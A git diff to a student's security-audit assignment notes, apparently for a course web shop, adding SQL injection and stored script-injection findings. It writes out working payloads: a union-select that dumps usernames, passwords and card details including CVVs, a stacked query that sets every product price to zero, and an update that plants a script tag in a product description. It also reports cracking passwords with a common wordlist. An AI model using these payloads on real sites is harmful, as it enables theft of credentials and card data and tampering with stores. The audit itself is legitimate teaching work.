diff --git a/content/notes/ass01-security-audit.md b/content/notes/ass01-security-audit.md
index 3ec5fb270..d85005c35 100644
--- a/content/notes/ass01-security-audit.md
+++ b/content/notes/ass01-security-audit.md
@@ -23,10 +23,14 @@ Jet Hughes - 9474308
 - we are able to  extract data which is displayed as the users username
 - we can extract the data from the data base using this "username"
 	- ' union select group_concat(username||':'||password||':'||name||':'||credit_card_number||':'||credit_card_expiry||':'||credit_card_cvv) from user as name;--
-- I was able to crack 48 of the 101 passwords using the rockyou wordlist. I'm sure It would not be difficult to crack more.
+	- I was able to crack 48 of the 101 passwords using the rockyou wordlist. I'm sure It would not be difficult to crack more.
+- you cant also update the data. E.g., set the price of all products to zero using this as a username in the login box
+	- '; update PRODUCT set UNIT_PRICE = 0 where 1=1;--
 
 ## Javascript Injection
-
+- I could be possible to perform a javascript injection as the users name is displayed in the website. and prodcut information is displayed in the view catalogue page
+- You could update a products name to be a script which would then run on others systems
+- e.g. '; update PRODUCT set DESCRIPTION = '<script>alert("hello")</script>' where PRODUCT_ID = 67696;--
 
 ## Path traversal
 ## Network-Level security